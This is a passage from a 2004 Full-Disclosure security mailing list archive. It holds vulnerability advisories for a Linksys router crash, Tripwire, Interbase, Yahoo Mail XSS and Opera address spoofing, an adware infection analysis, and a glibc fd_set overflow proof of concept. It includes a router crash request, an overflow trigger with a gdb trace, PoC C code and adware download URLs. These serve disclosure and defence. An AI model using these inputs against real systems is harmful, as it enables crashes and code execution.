AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&WANConnectionSel=0&ipAddr1=192&ipAddr2=168& ipAddr3=1&ipAddr4=1&netMask=0&WANConnectionType=1 This would cause the router to crash and the Factory reset button on the front of the Router would need to be pressed to restore it back to normal working order. III. ANALYSIS Exploitation may be particularly dangerous, especially if the router's remote management capability is enabled. It may also be easily exploited by fooling an admin of the router into clicking a link he/she thinks is valid. This is probably vuln in older version of the firmware. IV. DETECTION This vulnerability affects the BEFSR41 EtherFast Cable/DSL router with the latest firmware version 1.45.7 I also tested version 1.44.2z which is also vuln so probably all other version below this are also vuln . It may also be possible that other version of Linksys routers are vuln to this attack if they use the same type of management. I'm unable to confirm any other models that are vuln to this attack. The Linksys BEFSRU31 and BEFSR11 use the same version of firmware as the BEFSR41 so they are probably vuln. NOTE ADDED June 3rd 2004: The Vendor confirmed this vuln in all version stated at the start of this advisory V. RECOVERY Pressing the reset button on the front of the router and setting it back up from scratch should restore normal functionality to the router. VI. WORKAROUND Don't click untrusted links. VII. VENDOR 19 Oct 2003: First vuln discovered. 10 Nov 2003: Second vuln discovered. 01 Dec 2003: Vendor contacted via security at linksys.com 01 Dec 2003: Response Recived from jay.price at linksys.com 10 Dec 2003: Issue been turned over to project manager andreas.bang at linksys.com 17 Dec 2003: I was sent a beta release of the new firmware witch fixed the vuln but had a bug where the logging function wouldn't work. 22 DEc 2003: andreas.bang at linksys.com now moved office now to contact anbang at cisco.com 29 Jan 2004: Was told patches would be up in the next week 29 Feb 2004: They said there was a problem with the code, still no patches 24 Mar 2004: Recived a email about patches saying. BEFSR41 v3(Post on by 3/31) BEFSX41 (posted) BEFSR81 v2/v3(in progress) BEFW11S4 v3(post by 3/31) BEFW11S4 v4(posted) 02 Jun 2004: Advisory released to public still no patch for the Linksys BEFSR41 EtherFast Cable/DSL Router with 4-Port Switch http://www.linksys.com/download/firmware.asp?fwid=3 The version this advisory was first written for it still remains vuln to date. b0f (Alan McCaig) b0fnet at yahoo.com www.b0f.net ===== www.b0f.net __________________________________ Do you Yahoo!? Friends. Fun. Try the all-new Yahoo! Messenger. http://messenger.yahoo.com/ From sudharsha at sms.lk Thu Jun 3 10:18:23 2004 From: sudharsha at sms.lk (sudharsha) Date: Thu, 3 Jun 2004 15:18:23 +0600 Subject: [Full-Disclosure] watch guard Message-ID: <006a01c4494b$b8c639b0$9f64a8c0@eng> Hi all Does any one know a vulnarability in Watch guard? Rgds Sudharsha From pherman at frenchfries.net Thu Jun 3 00:41:16 2004 From: pherman at frenchfries.net (Paul Herman) Date: Wed, 2 Jun 2004 16:41:16 -0700 (PDT) Subject: [Full-Disclosure] Format String Vulnerability in Tripwire Message-ID: <20040602234116.9A3674A5B@frenchfries.net> SUMMARY ------- Tripwire(tm) is a Security, Intrusion Detection, Damage Assessment and Recovery, Forensics software. A vulnerability in the product allows a user on the local machine under certain circumstances to execute arbitrary code with the rights of the user running the program (typically root). VERSIONS AFFECTED ----------------- Tripwire commercial versions <= 2.4 Tripwire open source versions <= 2.3.1 DETAILS ------- A format string vulnerability exists when tripwire generates an email report (i.e. 'tripwire -m c -M'). Each line of the report is passed to an fprintf() function in pipedmailmessage.cpp in the following manner: fprintf(mpFile, s.c_str() ); If a local user were to create a file with a carefully crafted filename on the local system, that filename may be included in the report and passed to fprintf() (albeit from the heap.) No exploit is known at this time, but the author of this advisory believes this vulnerability could be exploitable. Tripwire Inc. has been notified and has implemented a fix. IMPACT ------ This vulnerability allows an attacker to execute arbitrary code with the rights of the user running the file check, which is typically root. The vulnerability exists only when tripwire is used to generate an email report. Users who do not generate an email report are not affected by this vulnerability. WORKAROUND ---------- Disable email reporting. All users are advised to upgrade to a version which is not vulnerable. PATCH ----- If you are using Open Source Tripwire(tm) version 2.3.1, the following patch will fix this particular issue: Index: src/tripwire/pipedmailmessage.cpp =================================================================== retrieving revision 1.1 retrieving revision 1.2 diff -u -r1.1 -r1.2 --- src/tripwire/pipedmailmessage.cpp 21 Jan 2001 00:46:48 -0000 1.1 +++ src/tripwire/pipedmailmessage.cpp 26 May 2004 20:59:15 -0000 1.2 @@ -180,7 +180,7 @@ void cPipedMailMessage::SendString( const TSTRING& s ) { - if( _ftprintf( mpFile, s.c_str() ) < 0 ) + if( _ftprintf( mpFile, "%s", s.c_str() ) < 0 ) { TOSTRINGSTREAM estr; estr << TSS_GetString( cTripwire, tripwire::STR_ERR2_MAIL_MESSAGE_COMMAND ) AUTHOR OF ADVISORY ------------------ Paul Herman ACKNOWLEDGEMENT --------------- I would like to thank Robert C. Jacobson <8dgb6hw02 at sneakemail.com> for an initial bug report which led to me discovering this vulnerability. TRIPWIRE TRADEMARK NOTICE ------------------------- The developer of the original code and/or files is Tripwire, Inc. Portions created by Tripwire, Inc. are copyright 2000 Tripwire, Inc. Tripwire is a registered trademark of Tripwire, Inc. All rights reserved. Nothing in the GNU General Public License or any other license to use the code or files shall permit you to use Tripwire's trademarks, service marks, or other intellectual property without Tripwire's prior written consent in the form of a license agreement signed by an officer of Tripwire, Inc. If you have any questions, please contact Tripwire, Inc. at either info at tripwire.org or www.tripwire.org. From theinsider at 012.net.il Thu Jun 3 03:20:48 2004 From: theinsider at 012.net.il (Rafel Ivgi, The-Insider) Date: Thu, 3 Jun 2004 04:20:48 +0200 Subject: [Full-Disclosure] 180 Solutions Exploits and Toolbars Hacking Patched Users(I.E Exploits) Message-ID: <000701c44911$62555e10$aa41b350@fucku> 180 Solutions Exploits and Toolbars Hacking Patched Users By Rafel Ivgi, The-Insider Table Of Contents: ********************* 1. Class Name 2. Infecting Files 3. Related Registery Entries 4. Cleaner 5. Solution 6. Visit : http://theinsider.deep-ice.com 1. Class Name: iiittt Class **************************** *Comment : All actions preformed on your machine are logged in the following hidden file: C:\WINDOWS\system32\log.bak.txt Class Id : {FE1A240F-B247-4E06-A600-30E28F5AF3A0} Downloading c:\install.cab Excuting c:\install.htm 2. Infecting Files: ******************** http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=!!generate!!&partner_id=&product_id=&browser_ok=y&rnd=34&basename=msbb&SID=YJGHCHUV&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=42033152&TVM=2147352576&AVM=2084216832&FDS=1542299648&LAD=1601:1:1:0:0:0&WE=5 http://downloads.180solutions.com/keywords/kyf.258.gz to c:\windows\system32\kyf.dat http://installs.180solutions.com/downloads/boom/2.0/RBoomerang.1 to C:\WINDOWS\abolaror.exe http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=26&basename=msbb&SID=AZWDUFMF&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=49520640&TVM=2147352576&AVM=2070482944&FDS=1538985984&LAD=1601:1:1:0:0:0&WE=5 c:\windows\system32\FLEOK\msbb.exe from http://installs.180solutions.com/downloads/5.6/msbb.exe http://installs.180solutions.com/downloads/5.6/msbb.exe to c:\windows\system32\FLEOK\msbb.exe http://bis.180solutions.com/config.aspx?did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=9&basen ame=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&SID=NYBQFSPS&OS=5.1.26 00.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0. 2800.1&TPM=267890688&APM=70152192&TVM=2147352576&AVM=2070474752&FDS=15387238 40&LAD=1601:1:1:0:0:0&WE=5&TCA=0&SCA=0&MRDS=0 http://installs.180solutions.com/Downloads/DLL/3.0/ncmyb.dll to c:\windows\system32\FLEOK\ncmyb.dll http://tv.180solutions.com/showme.aspx?keyword=.tightasianass.com&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=32&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=61321216&TVM=2147352576&AVM=2051579904&FDS=1538109440&LAD=1601:1:1:0:0:0&WE=5 http://216.130.188.219/ei2/index.html http://69.42.67.154/topbucks/tp2/index.html http://216.130.188.219/ei2/installer.htm http://69.42.67.154/topbucks/tp2/index.html http://exits.freepornpics.com/timed_exits/straight_timed_pop.htm http://216.130.188.219/ei2/index.html http://69.42.67.154/_mpbfpas/free_trial_multisite/index.html http://tv.180solutions.com/showme.aspx?keyword=trial&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=23&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=37040128&TVM=2147352576&AVM=2031108096&FDS=1536757760&LAD=1601:1:1:0:0:0&WE=5 http://exits.freepornpics.com/timed_exits/fpa_pinkpays.html http://www.i-lookup.com/index1.php 3. Related Registery Entries: ****************************** [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}] @="iiittt Class" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Control] [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented Categories] [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}] [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InprocServer 32] @="C:\\WINDOWS\\System32\\windec32.dll" "ThreadingModel"="Apartment" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus] @="0" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus\1 ] @="131473" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ProgID] @="windec.iiittt.1" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Programmable ] [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ToolboxBitma p32] @="C:\\WINDOWS\\System32\\windec32.dll, 102" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\TypeLib] @="{660B38CB-6349-4C67-A418-AADABAE09C38}" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Version] @="1.0" [HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\VersionIndep endentProgID] @="windec.iiittt" [HKEY_CLASSES_ROOT\windec.iiittt] @="iiittt Class" [HKEY_CLASSES_ROOT\windec.iiittt\CLSID] @="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}" [HKEY_CLASSES_ROOT\windec.iiittt\CurVer] @="windec.iiittt.1" [HKEY_CLASSES_ROOT\windec.iiittt.1] @="iiittt Class" [HKEY_CLASSES_ROOT\windec.iiittt.1\CLSID] @="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}] "SystemComponent"=dword:00000000 "Installer"="MSICD" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains\Files] "C:\\WINDOWS\\System32\\windec32.dll"="" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\DownloadInformation] "CODEBASE"="file://C:\\install.cab" "INF"="C:\\WINDOWS\\Downloaded Program Files\\windec32.inf" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InstalledVersion] @="2,0,0,0" 4. Cleaner: ************* Filename=180killer.bat: -------------------------------------------CUT ERE ------------------------------------------------- taskkill /f /im iexplore.exe taskkill /f /im explorer.exe taskkill /f /im dllhost.exe del c:\install.htm del c:\install.cab taskkill /f /im abolaror.exe del C:\WINDOWS\abolaror.exe taskkill /f /im msbb.exe del c:\windows\system32\FLEOK\msbb.exe taskkill /f /im apconaj.exe del c:\windows\system32\apconaj.exe taskkill /f /im alchem.exe del c:\windows\alchem.exe rmdir /s /q c:\windows\system32\FLEOK rmdir /s /q c:\windows\sbnet del C:\WINDOWS\System32\windec32.dll explorer.exe reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v ShowBehind /f reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v msbb /f reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v abolaror /f reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v chiqarsfneg /f reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v alchem /f -------------------------------------------CUT ERE ------------------------------------------------- 5. Solution: ************* The excution of this Internet Exploerer exploit was caused by ms-its[Even Patched]. The ms-its protocol is not needed for windows normal operations, therefore it should be removed. XPLizer - Windows Hardning Frontend Tool - Updated for removing ms-its protocol. http://www.securiteam.com/tools/5EP081FCKI.html The sources of XPLizer can be found at http://theinsider.deep-ice.com/xplizer-src.zip An executable version can be found at http://theinsider.deep-ice.com/xplizer.zip The official readme file for XPLizer can be found at http://theinsider.deep-ice.com/readme.txt From etomcat at freemail.hu Thu Jun 3 10:25:14 2004 From: etomcat at freemail.hu (Feher Tamas) Date: Thu, 3 Jun 2004 11:25:14 +0200 (CEST) Subject: [Full-Disclosure] Twenty years after 1984 or, well... Message-ID: http://www.theregister.co.uk/2004/06/03/text_punk/ Secret Police slap cuffs on Punk SMSer by Lucy Sherriff, TheRegister, 3 June 2004 A tech worker was arrested yesterday after a text message he sent was intercepted and traced back to his phone. In a scene reminiscent of Neo's first escape from Agent Smith, Special Branch officers slapped the cuffs on Mike Devine at his office in Bristol yesterday, and took him away for questioning. Devine, who plays in a Clash tribute band in his spare time, had sent a message containing lyrics from The Clash's Tommy Gun to his lead singer who had forgotten the words to the song. According to The Sun, the message read: "How about this for Tommy Gun? OK - SO LET'S AGREE ABOUT THE PRICE AND MAKE IT ONE JET AIRLINER AND TEN PRISONERS" The arrest has prompted speculation about how the message was intercepted. Police maintain that Devine's message went astray. They say he actually sent it to a woman in Bristol by mistake and it was she who alerted police to the content. !>However, The Sun quotes Chris Dobson, a terrorism expert, as !>saying that the interception clearly shows that GCHQ is !>monitoring all vocal and textual mobile phone traffic. Devine himself is slightly bemused by the incident. He said: "It hadn't even occurred to me that it might look a bit dodgy. It was quite nerve wracking for Special Branch to come looking for you at work. I was thinking, Oh God, what have I done?" The police questioned Devine about his phone, and asked if he had used it to send texts at the end of April. They showed him a print out of the text and asked him to confirm that he had sent it. "I said, 'That's the lyrics from Tommy Gun. I'm in a tribute band'," Devine said. Fortunately, once he explained that the message was not part of a terrorist plot, the police accepted his explanation and let him go, but not before suggesting to Devine that he be careful about where he sent such messages in future. Big Brother is watching you! From goggles at hush.com Thu Jun 3 11:19:15 2004 From: goggles at hush.com (goggles at hush.com) Date: Thu, 3 Jun 2004 03:19:15 -0700 Subject: [Full-Disclosure] GOGGLES ADVISORY: FLAW IN MAJOR DISTRIBUTIONS Message-ID: <200406031019.i53AJIsL030902@mailserver2.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _,--, _ __,-'____| ___ /' | /' `\,--,/' `\ /' | ( ) ( )' \_ _/' `\_ _/ """ """ I R WATCHING Y0U GOGGLES SECURITY ADVISORY #forty-two GOGGLES has discovered attempt of big security company to disclose bug in many major UNIX variants. GOGGLES believes in perfect world and security bug should not be disclosed by company to make quick fame and money, but to selflessly strive for collective effort to make better and more secure world for everyone to live in. GOGGLES strives for this and decides to regulate release of information with this ethical ideal in mind and not capitalistic gain for big company. GOGGLES explicitly disclaims credit for discovery, and has to tell world company did not make discovery either, even if it claims so afterwards. Discovery seems to have been made by tribes of pagans and heretics who are yet to achieve Enlightenment and discover True Path of Full-Disclosure. Problem GOGGLES did not discover but tries to make perfect world with is in libc select() function. select() is bad way to do event driven notification for io events, GOGGLES believes true men and real women use epoll or kqueue these days, and that only real idiots use /dev/poll. select() is bad for security as well, as Theo de Raadt proved with OpenBSD operating system. Pagans discovered fd_set structure select() uses often allocates static amount of space for monitoring descriptors for events. Proof of concept code kindly provided in sys/select.h from glibc, where idiots coded: __fd_mask fds_bits[__FD_SETSIZE / __NFDBITS]; GOGGLES notes that every descriptor is tracked by single bit, and this way normally 128 bytes will be reserved for 1024 descriptors. Pagans decided that rlimit for amount open files is 1024 as well, so code will not go *BOOM* and is more secure than OpenBSD code (note: in this respect they seem to be right). Now pagans decided that rlimit for amount of open files raised above 1024 could make select() *BOOM* and proceeded to check theory. GOGGLES did check on glibc bits/select.h to verify pagan idea, and found that bigger idiots coded amongst others: # define __FD_SET(fd, fdsp) \ __asm__ __volatile__ ("btsl %1,%0" \ : "=m" (__FDS_BITS (fdsp)[__FDELT (fd)]) \ : "r" (((int) (fd)) % __NFDBITS) \ : "cc","memory") So pagan hypothesis would work in theory, GOGGLES not believed eyes, and continued test with proof-of-concept code for believers in True Path who are more rigid than pagans in accepting the obvious and comprehending the world around them; this of course in perfect analogy with christians and pagans we all heard of. #include #include #include #include #include #include #include int main(void) { struct rlimit _; char __[256]; fd_set ___; unsigned int ____; _.rlim_cur = _.rlim_max = 0xDULL + 0xC0DE; if(setrlimit(RLIMIT_NOFILE, &_) == -1) { fprintf(stderr, "GOGGLE GOGGLE\n"); exit(EXIT_FAILURE); } memset(__, 0, sizeof(__)); for(____ = 3; ____ < 1024; ____++) close(____); for(____ = 0; ____ < 1024 + sizeof(__) * 8; ____++) { int _; if( (_ = open("/dev/null", O_RDONLY)) != -1) FD_SET(_, &___); else { fprintf(stderr, "GOGGLE GOGGLE\n"); exit(EXIT_FAILURE); } } printf("%s\n", &0[__]); /* diz is to look stupid */ } Now GOGGLES run example code on Linux machine at home, and find this output: ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????0???A GOGGLES realize that to exploit problem rlimit has to be raised, which can only be done as root, even with local access. But, GOGGLES and pagans reasoned, if server such as inetd or so raises rlimit by itself to something higher than 1024 then by making connections we can call FD_SET and overflow fd_set structure with bits. GOGGLES believes in perfect world, and therefore will not release proof of concept exploit, since in perfect world no crackers exist who will run it, and every administrator is smart enough to see problem from illustrations above. GOGGLES does not want contact about this bug, and since pagans do not have telephones GOGGLES does not have way to reach them for more information. However, provided are following numbers of company trying to make big money by stealing pagan techniques and not aim to make world a good place to live in, so people can ask for more information about financial exploitation of software consumers for information which is free in perfect world. This is great way to start your own security company. +31-70-3111010 (ask for Patrick Oonk or Mark Lastdrager) +31-70-3107390 (ask for Iljitsch van Beijnum) +31-50-5420781 (ask for Joost Pol or the hacker that defaced cn.freebsd.org) +31-6-26630263 or +31-6-53760017 (ask for {} or if you cannot pronounce this, ask for the hacker that defaced apache.org) Or send fax of favourite underpants worn for weeks to: +31-70-3111011 +31-70-3635911 GOGGLES is sad to not know for sure if all numbers work, but at least should be enough to provide public with usable information. GOGGLES hopes to have made world slightly better place this way, and prevent commercial rip-off of poor software consumers and false claims to discovery we see from many security company, and especially XFORCE- ISS. Signed, GOGGLES -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkC++x8ACgkQ42dM9omIJ0TrFgCfesdGtJMDWC1yFPqf41UUhXn2+N0A n3Y8l4IcFYnNIo0/g4AQKrDZVi8U =fvjl -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 From noamr at beyondsecurity.com Thu Jun 3 11:36:33 2004 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Thu, 3 Jun 2004 13:36:33 +0300 Subject: [Full-Disclosure] Re: Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow In-Reply-To: <40BE8707.6090707@secnetops.com> References: <200406012040.14839.aviram@beyondsecurity.com> <200406021043.25680.noamr@beyondsecurity.com> <40BE8707.6090707@secnetops.com> Message-ID: <200406031336.33787.noamr@beyondsecurity.com> On Thursday 03 June 2004 05:03, KF (lists) wrote: > Someone that has had some success communicating things security wise to > Borland may wish to contact them about this. > > [root at CloneRiot bin]# rpm -ivh /root/InterBaseSS_LI-V7.1.0-1.i386.rpm > > [kf at CloneRiot bin]$ pwd > /opt/interbase/bin > [kf at CloneRiot bin]$ ./gsec -database 127.0.0.1:`perl -e'print ("A"x300)'` > > (gdb) c > Continuing. > [New Thread 1085279152 (LWP 21355)] > [New Thread 1095769008 (LWP 21356)] > [New Thread 1106258864 (LWP 21357)] > > Program received signal SIGSEGV, Segmentation fault. > [Switching to Thread 1085279152 (LWP 21355)] > 0x41414141 in ?? () > (gdb) bt > #0 0x41414141 in ?? () > #1 0x41414141 in ?? () > #2 0x41414141 in ?? () > ... > #35 0x41414141 in ?? () > #36 0x41414141 in ?? () > (gdb) > > (gdb) i r > eax 0x0 0 > ecx 0x82025e4 136324580 > edx 0x0 0 > ebx 0x81fe29c 136307356 > esp 0x40aff5f8 0x40aff5f8 > ebp 0x41414141 0x41414141 > esi 0x12c 300 > edi 0x40affab8 1085274808 > eip 0x41414141 0x41414141 > eflags 0x10246 66118 > > (gdb) x/1s $esp > 0x40aff5f8: 'A' > > [root at CloneRiot interbase]# ./bin/ibserver > Segmentation fault > -KF > > Noam Rathaus wrote: > >On Sunday 02 June 2002 01:52, KF (lists) wrote: > >>So is this firebird specific or does it also impact Borland Interbase > >>users? > >>-KF > > > >We haven't tested Borland's Interbase as we didn't have any installation > >available for testing. However I can assume that since this vulnerability > >appears in version 1.0.2, which is of very close resemblance to Borland's > >Interbase sources, that the vulnerability may also affect it. Hi, Well it appears that the Borland version is a bit more vulnerable, or in other words more exploitable, as in the Firebird I was unable to directly modify EIP, while it appears that the Borland version's EIP is easily modifyable. Thank you for the assistance in verifying whether Borland's Interbase is also vulnerable. -- Thanks Noam Rathaus CTO Beyond Security Ltd. Join the SecuriTeam community on Orkut: http://www.orkut.com/Community.aspx?cmm=44441 From blancher at cartel-securite.fr Thu Jun 3 10:47:54 2004 From: blancher at cartel-securite.fr (Cedric Blancher) Date: Thu, 03 Jun 2004 11:47:54 +0200 Subject: [Full-Disclosure] watch guard In-Reply-To: <006a01c4494b$b8c639b0$9f64a8c0@eng> References: <006a01c4494b$b8c639b0$9f64a8c0@eng> Message-ID: <1086256074.1960.10.camel@anduril.intranet.cartel-securite.net> Le jeu 03/06/2004 ? 11:18, sudharsha a ?crit : > Does any one know a vulnarability in Watch guard? http://www.cartel-securite.fr/pbiondi/adv/CARTSA-20030314-icmpleak.txt It applied to watchguard boxes, but is patched, and firewalls should now be shipped with non vulnerable firmwares. -- http://www.netexit.com/~sid/ PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE >> Hi! I'm your friendly neighbourhood signature virus. >> Copy me to your signature file and help me spread! From security at greymagic.com Thu Jun 3 14:52:32 2004 From: security at greymagic.com (GreyMagic Software) Date: Thu, 3 Jun 2004 15:52:32 +0200 Subject: [Full-Disclosure] Simple Yahoo! Mail Cross-Site Scripting (GM#006-MC) Message-ID: <20040603125050.6E270FC0C3@bela.bezeqint.net> GreyMagic Security Advisory GM#006-MC ===================================== GreyMagic Software, 03 Jun 2004. Available in HTML format at http://www.greymagic.com/security/advisories/gm006-mc/. Topic: Simple Yahoo! Mail Cross-Site Scripting. Discovery date: 16 May 2004. Affected applications: ====================== * Yahoo! web-based email service. Introduction: ============= Web-based email services and Yahoo! specifically make tremendous efforts to sanitize incoming emails from potentially unsafe HTML content. Flawed filtering of such unsafe content may result in severe consequences that would occur as soon as a user opens an email for reading, including: * Theft of login and password. * Content disclosure of any email in the mailbox. * Automatically send emails from the mailbox. * Exploitation of known vulnerabilities in the browser to access the user's file system and eventually take over the machine. * Distribution of a web-based email worm. * Disclosure of all contacts within the address book. Discussion: =========== GreyMagic discovered that by sending a maliciously formed email to a Yahoo user it is possible to circumvent the filter and execute script in the context of a logged-in Yahoo! user. A known Cross-Site Scripting weakness is using entities instead of actual chars, for example: "javascript:alert()". There is also a variation of that weakness, caused by the way browsers ignore white-space chars in URLs: "java script:alert()". Yahoo! properly filters both of these scenarios. However, a third variation remains unfiltered. It is possible to embed a javascript URL by using a white-space entity with multiple zero chars in front of it: "java script:alert()". Exploit: ======== The following HTML embedded in an email would show a Yahoo! user's cookie when opened:

Hel lo!

Solution: ========= GreyMagic informed Yahoo! of the vulnerability on 20-May-2004. Yahoo! responded promptly and reported that it patched the vulnerability on 24-May-2004. Tested on: ========== Yahoo! web-based email service. Disclaimer: =========== The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind. GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. - Copyright ? 2004 GreyMagic Software. From security at greymagic.com Thu Jun 3 14:53:59 2004 From: security at greymagic.com (GreyMagic Software) Date: Thu, 3 Jun 2004 15:53:59 +0200 Subject: [Full-Disclosure] Phishing for Opera (GM#007-OP) Message-ID: <20040603125216.051B8FC42D@marco.bezeqint.net> GreyMagic Security Advisory GM#007-OP ===================================== By GreyMagic Software, 03 Jun 2004. Available in HTML format at http://security.greymagic.com/security/advisories/gm007-op/. Topic: Phishing for Opera. Discovery date: 16 May 2004. Affected applications: ====================== Opera 7.50 and prior. Introduction: ============= Most browsers today implement a "Shortcut Icon" (favicon) feature. This feature gives web-sites the option to add a small icon to the address bar and/or favorites. Opera also implements this feature. However, unlike other browsers, Opera allows the use of icons that may be large in width. Discussion: =========== It is possible to use this feature in Opera to fool users into believing that they are in a domain they trust (their bank, web-mail, etc) while serving and receiving content in a hostile domain. Thereby enabling identity theft, credit card scams and more. This can be done by creating an icon that contains the text of the desired site, which would be similar in appearance to the way Opera shows addresses in the address bar. This alone, however, is not enough, as it will cause the real address to appear to the right of the fake address. Unfortunately, this too can be circumvented by tricking Opera into showing the right-hand side of the attacking URL, while filling that side with spaces. The result is a very convincing fake address appearing in the address bar. Exploit: ======== Create an image that looks like an address in Opera's address bar and use the following element to include it in a page: Demonstration: ============== A proof-of-concept demonstration of this issue is available at http://security.greymagic.com/security/advisories/gm007-op/. Solution: ========= GreyMagic informed Opera of the vulnerability on 19-May-2004. A new version (7.51) was released on 03-Jun-2004 to address this problem. Tested on: ========== Opera 7.23. Opera 7.50. Disclaimer: =========== The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind. GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. - Copyright ? 2004 GreyMagic Software. From _ at r4k.net Thu Jun 3 14:50:04 2004 From: _ at r4k.net (Stephanie Wehner) Date: Thu, 3 Jun 2004 15:50:04 +0200 Subject: [Full-Disclosure] analysis (more worms wanted :) ) Message-ID: <20040603135003.GQ50382@r4k.net> Hi, First of all, thanks to everyone who provided me with worms as a response to my last email. So far I have analyzed the executables (or scripts) of worms, where my aim was to determine the familiy of an unknown worm. (different versions of the same worm form a family) This worked quite well, for example for Sasser D as input, it was easy to tell that it belongs to the Sasser family. You can view some pictures at http://www.cwi.nl/~wehner/worms, where you can also find more information about the approach I used. Note that this is *work in progress*. I'm looking for more worms to analyze. Unfortunately I don't have any lab setup/multiple machines/ips to collect them easily. (This is a fun project, my main area of research lies elsewhere.) I have also looked at network traffic, which works quite well for general traffic. I will post more about this on my webpage in the near future. However, I am now especially looking for traffic generated by worms. :) Thanks, Stephanie --<> _ at r4k.net <>------------------<> FreeBSD <>------------------- #3 - Anime Law of Sonic Amplification, First Law of Anime Acoustics In space, loud sounds, like explosions, are even louder because there is no air to get in the way. From SkyLined at edup.tudelft.nl Thu Jun 3 15:12:49 2004 From: SkyLined at edup.tudelft.nl (Berend-Jan Wever) Date: Thu, 3 Jun 2004 16:12:49 +0200 Subject: [Full-Disclosure] Simple Yahoo! Mail Cross-Site Scripting (GM#006-MC) References: <20040603125050.6E270FC0C3@bela.bezeqint.net> Message-ID: <000701c44974$da2db8c0$0100a8c0@grotedoos> When I was into finding XSS, I found holes in just about every web-based email provider with relative ease... The only one that I found was pretty hardened was 